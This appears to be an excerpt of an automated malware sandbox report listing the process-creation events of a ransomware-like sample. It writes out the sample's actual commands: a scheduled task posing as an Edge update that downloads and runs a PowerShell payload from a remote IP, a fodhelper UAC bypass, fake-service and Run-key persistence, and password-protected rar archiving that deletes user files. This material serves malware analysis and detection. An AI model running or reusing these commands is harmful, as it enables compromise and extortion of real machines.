          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY=.rar1" "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY="
          Source: C:\Windows\Temp\rar.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\rar.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\rar.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\findstr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\rar.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\findstr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C fodhelper.exeJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")"Jump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /run /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456Jump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\sc.exe sc create msupdate binpath= C:\Windows\Temp\C:\Windows\Temp\daemon.exeJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\sc.exe sc description msupdate "Just For Test"Jump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\sc.exe sc config msupdate start= autoJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\net.exe net start msupdateJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /fJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /fJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /fJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepathJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\findstr.exe findstr encrypt.exeJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\Temp\encrypt.exe C:\Windows\Temp\encrypt.exeJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper.exeJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\reg.exe "reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start msupdateJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\daemon.exe C:\Windows\Temp\daemon.exeJump to behavior
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\findstr.exe findstr encrypt.exe
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\findstr.exe findstr scan.exe
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\Temp\scan.exe C:\Windows\Temp\scan.exe
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY=.rar1" "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\encrypt.exeProcess created: unknown unknown
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
